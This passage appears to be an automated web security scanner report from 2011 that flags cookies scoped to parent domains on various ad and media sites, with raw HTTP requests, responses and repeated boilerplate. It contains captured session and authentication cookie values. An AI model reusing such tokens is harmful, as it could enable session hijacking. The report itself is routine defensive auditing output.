HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Date: Mon, 02 May 2011 22:16:02 GMT Expires: -1 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Pragma: no-cache Server: Microsoft-IIS/6.0 Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/ Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/ Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/ Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/ X-AspNet-Version: 4.0.30319 x-machine-name: Rainbow-28 (i-00667d77) X-Powered-By: ASP.NET Content-Length: 3147 Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title></title>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.capterra.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /science/journal/09574174 HTTP/1.1 Host: www.sciencedirect.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 200 OK Date: Mon, 02 May 2011 21:30:11 GMT Last-Modified: Mon, 02 May 2011 21:30:11 GMT Set-Cookie: EUID=5c90559a-7503-11e0-a9ef-00008a0c593e; expires=Sunday, 27 Apr 2031 21:30:11 GMT; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMISESSION=5c8fd124-7503-11e0-a9ef-00008a0c593e:3481824611; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMIAUTH=eb9092b9359d796deaaa50f404edb475f8f314ccbfd08dcf0e1e523e31854f5f604fbffdf4977365769b852ffa16d2dea7b9db8616c1b39d8dd60cd15475b6f0b3ee334e505c6e4e55e130a20ef5c10ba3c9876e4263f1ad055fab611d82cc7426ac7fde03dd09460d1b08b658457a33b18b752c5d43253a487a091cbb6d637610d1e7106a65fcf10b75f36b7811b36cb75cb6a0341d9c0235ae752182e7f8b412372d4115c9b7d30b27d80dbd6ee795f15a38ce4922bdc2f06d88e8c622e396dad16444a66e001e2b5db1798fc4c70bc3ea373e5818ca0699e2768df0eb0236b0c50b65f461cfed1cec6cd529701c55becdd3c14767f97b9f8f4b34762d3945; path=/; domain=.sciencedirect.com; HttpOnly; Set-Cookie: MIAMIAUTH=eb9092b9359d796deaaa50f404edb475f8f314ccbfd08dcf0e1e523e31854f5f604fbffdf4977365769b852ffa16d2dea7b9db8616c1b39d8dd60cd15475b6f0b3ee334e505c6e4e55e130a20ef5c10ba3c9876e4263f1ad055fab611d82cc7426ac7fde03dd09460d1b08b658457a33b18b752c5d43253a487a091cbb6d637610d1e7106a65fcf10b75f36b7811b36cb75cb6a0341d9c0235ae752182e7f8b412372d4115c9b7d30b27d80dbd6ee795f15a38ce4922bdc2f06d88e8c622e396dad16444a66e001e2b5db1798fc4c70b1c496669dc41dbcaa56c4d113b5e25a946db4b7eade4d41795906e7b40cd0395bf9f4873f3a55ae8415846900b9cada8; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1162923096 Server: www.sciencedirect.com 9999 138.12.6.53:80 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK Date: Mon, 02 May 2011 21:30:41 GMT Last-Modified: Mon, 02 May 2011 21:30:41 GMT Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1136083128 Server: www.sciencedirect.com 9999 138.12.6.33:443 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- TRA ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /scripts/services/dynamicsGalleryService.asp?idCollection=3615&nax=2 HTTP/1.1 Host: www.yoox.com Proxy-Connection: keep-alive Referer: http://www.yoox.com/_partners/luxury24/slide_luxury_moda_210x195.swf Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=apnlbZaRkP6dPeCnw7cTj0ZaA4FZb2mq3iZc5QWFcgQ1qoaFjZb7yhwYou30slVghs777kSRP6F4n7i4tbkDBKA3flNWD7G4PrKidUMm4uHEhIZbgu7f5RJ6Sa852UJS62FpwTKLUBnfZakQh4lKZc5cvGAin5YrlLuZcrSoenpptWZd5Ws2WcQxH9qhdyub6dneP6MHPteqOCDDfTudRLe8sGVellGGcqPPgCmJZbdQ3cogm2Exrfum7vCU9QcUoVg0iUQ4mSg3bdbyrPVL9SSnqFyl9B85wGr1mSGE8vsQwu873SoOIxNk8Xj16bmj7cg4EZcjdFawnctijtTLoj9brK6A5SyywLwtng11wTxlj8VNZd4a1xCdgFoipLtKE5IjIGrbSBM5hOZdk3hP6nbX2cmrPx259CZcVUrQllJZc1S5MADWQhSgjmADaf4ERECORSWYoZbQZdOekqyZavT6lEatuVUZbxVoGHofFfhvYmYFthR6EEMHBdR57R6xADTxm9SHUXHNetUo5Xs035eWtbPu;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 02 May 2011 22:46:04 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Mon, 02 May 2011 22:31:04 GMT Expires: Mon, 02 May 2011 22:31:04 GMT Cache-Control: private Content-Length: 5973
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon May 02 04:27:54 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 03 May 2011 00:09:10 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Date: Mon, 02 May 2011 23:54:10 GMT Expires: Mon, 02 May 2011 23:54:10 GMT Cache-Control: private Content-Length: 244
cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ad/tiscaliadv.jsp?loc=ans_ans_hom_304x450_d&l3d=http://ad.it.doubleclick.net/click%3Bh%3Dv8/3afb/3/0/%2a/d%3B223125489%3B0-0%3B1%3B22822695%3B31939-304/450%3B35898920/35916798/1%3B%3B%7Eaopt%3D2/1/4/0%3B%7Esscs%3D%3f&bt=a&wt=n&rnd=281253354039 HTTP/1.1 Host: ad78.neodatagroup.com Proxy-Connection: keep-alive Referer: http://www.ansa.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:39 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"; policyref="/ad/w3c/p3p.xml" Set-Cookie: cP=AQkCX2WTj3IICQAAAAABS7g6AP///50AAQAAAgAEtzwAAQAAA3VzLS0tLQAA; path=/; domain=neodatagroup.com; expires=Fri, 30-Apr-2021 00:17:39 GMT Set-Cookie: cS=AQIABLc8AAEAAAcAAE9ZAAEAAA==; path=/; domain=neodatagroup.com; Set-Cookie: cProfile=AQJfZZOPcggJAAAAAAAPAAABMAAJK7kAB2RlZmF1bHQ=; path=/; domain=neodatagroup.com; expires=Wed, 18 May 2011 00:17:39 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 758 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:17:39 GMT Connection: close
var adCUrl='http://adlev.neodatagroup.com/ad/clk.jsp?x=179706.157501.1063.309052.-1.-1.9.78.1.1230.1.-1.-1.-1..-1.16..4.%26link=http%3A%2F%2Fclk.tradedoubler.com%2Fclick%3Fp%3D205518%26a%3D1527836%26g ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder? HTTP/1.1 Host: adv.ilsole24ore.it Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:13:39 GMT Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8 Set-Cookie: RMID=adc1d6f34dbf2c90; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI" Content-Length: 37380 Expires: Tue, 25 Apr 1995 09:30:27 -0700 Pragma: no-cache Connection: close Content-Type: application/x-javascript
function OAS_RICH(position) { if (position == 'BackGround') { document.write ('<A HREF="http://adv.ilsole24ore.it/5c/www.ilsole24ore.it/10/_01_000_/_homepage/1266591715/BackGround/OasDefault/default/e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.webank.it/lndpage/promo321.html">here</ ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930 HTTP/1.1 Host: adv.ilsole24ore.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RMFL=011QH1NVU1088N; RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="http://www.stile-magazine.it">here</A>.<P> <HR> <A ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /question/index HTTP/1.1 Host: answers.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:23:12 GMT Set-Cookie: B=5sbapqt6rubmg&b=3&s=f4; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Status: 404 Not Found Imagetoolbar: Set-Cookie: answers=SmhGfTfoOQ0db.8ef0vD2MzHIRDUJi5bCY5ng3si3sBcAcCR4N72Pka1dVM2fcTrURXaSQYY2_mqK8uzpRHwf9wPbtuRYlbhorqJHtpY2GKqq.JsOSGpmveDCpUBh22NekdTb4.cmnPTfArTQUtT07zHPK_iVLSXlvnJbBt6ti1cTQIQlPFAI_bPyYeDaLWdmUHgXpNxWiIe46.buzxw7UQd5xq8H6dOqfL6ipn42XhIN1GeHTcHUzKQV.U_fRrPr55OCJ.J7Bxj2CERgjpSSffDzPPFlCBJqDJdNxsbpZKA_6AQnjW_woyyiObtdzgEKGzlwreqRQTbIxmyF_NzaHvwbf75KWnggrA48ra6cEeQaePU71NHfUw3d4hFiGzlsgQ7d9vY8aWxBVrogLo9OHQSLvBDpNxTJ4E8Pfsui6MJMPPZhZ_f7X6_Sy3GDbWnwEaO4aHqcCPApAa32_FMh7BKzsioUMzDf_u9cdhNDWdImio6wGJ9KDo-; expires=Wed, 02-May-2012 22:23:12 GMT; path=/; domain=.answers.yahoo.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 31141
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-us" dir="ltr"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" ...[SNIP]...
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
slat=1304375040; domain=.alice.it; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /aap/serviceforwarder HTTP/1.1 Host: auth.rossoalice.alice.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Mon, 02 May 2011 22:23:33 GMT Server: Apache Location: http://maileservizi.alice.it/home/login.html Set-Cookie: slat=1304375040; domain=.alice.it; path=/ Connection: close Content-Type: text/html Content-Length: 283
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://maileservizi.alice.it/home/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cm/tr/17671-124835-21707-7?mpt=1304392432100 HTTP/1.1 Host: cdn4.eyewonder.com Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Set-Cookie: svid=68257899343; expires=Fri, 2-May-2014 5:23:04 GMT; path=/; domain=.eyewonder.com; Set-Cookie: mojo3=17671:21707; expires=Thu, 2-May-2013 5:23:04 GMT; path=/; domain=.eyewonder.com; Content-Type: image/gif Content-Length: 49 Date: Mon, 02 May 2011 22:16:38 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /post HTTP/1.1 Host: del.icio.us Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Mon, 02 May 2011 22:24:02 GMT Set-Cookie: BX=269mihl6rubo2&b=3&s=pq; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.icio.us P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://www.delicious.com/post Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Cache-Control: private Content-Length: 162
The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P> <!-- fe09.web.del.ac4.yahoo.net uncompressed/chunked Mon May 2 22:24:02 UTC 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Mon, 02 May 2011 23:04:57 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Set-Cookie: AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/ Location: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=40572&clicktag=[URLTRACKING]&rnd=[RANDOM] Content-Length: 340 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://ieo.solution.weborama.fr/fcgi-bin/adserv ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /add HTTP/1.1 Host: it.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Mon, 02 May 2011 22:25:38 GMT Set-Cookie: B=b85h77h6rubr2&b=3&s=u7; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Location: http://it.add.yahoo.com/ Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Age: 0 Connection: close Server: YTS/1.20.0
<html><body>This page has moved, please <a href="http://it.add.yahoo.com/">click here</a> to go to its new location.</body></html><!-- w95.fp.re1.yahoo.com uncompressed/chunked Mon May 2 15:25:38 PDT ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/jquery.cookie.js HTTP/1.1 Host: local.virgilio.it Proxy-Connection: keep-alive Referer: http://www.telecomitalia.it/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Alice Mail: e-mail gratis e posta elettronica sicura</title> <meta http-equi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
